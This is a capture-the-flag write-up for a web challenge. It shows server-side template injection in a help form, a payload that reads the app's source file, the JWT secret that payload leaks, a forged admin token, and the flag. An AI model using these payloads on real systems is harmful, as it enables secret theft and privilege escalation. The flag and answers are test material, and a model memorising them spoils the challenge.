WX01 - 1000pts
Last updated
Was this helpful?
Last updated
Was this helpful?
Access the url at: and find a way to login to the admin portal to get the flag. Note: You have been provided with the following credentials to help you: username:
tim
password:berners-lee
There is a login form and a form to enter an email address to get help logging in. Attempting to login with the provided credentials, tim:berners-lee
, and monitoring requests using Burp Suite shows that a POST request with the JSON action
key set to verify
and a token
key that corresponds to a JSON Web Token.
I attempted to brute force decrypt this JWT, but it did not succeed.
I moved on to the help form. It has to serve a purpose and thus must be vulnerable to some form of input. I tried a similar to the Italian dish suggestion site from . Crashing the help form using the SSTI string {{foo()}}
prints this as part of a stacktrace:
We have access to locals()
and globals()
. Also, open()
lets us read an arbitrary file.
Use {{open('lambda_function.py').read()}}
to dump the contents of lambda_function.py
:
The JWT key is aversion-chute-freeway-corporal
.
Login with credentials tim:berners-lee
to get a JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJ1c2VyIn0.j8wX114OSLEo2I4S6GQ4wQ4ZszXtyp0wFc0lpwc1yRQ
.
Use to change the role
value from user
to admin
with the leaked secret key to get a new JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU
Send a request with this JSON {"action":"verify","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU"}
to get the flag.
muLtiStagingIT710-12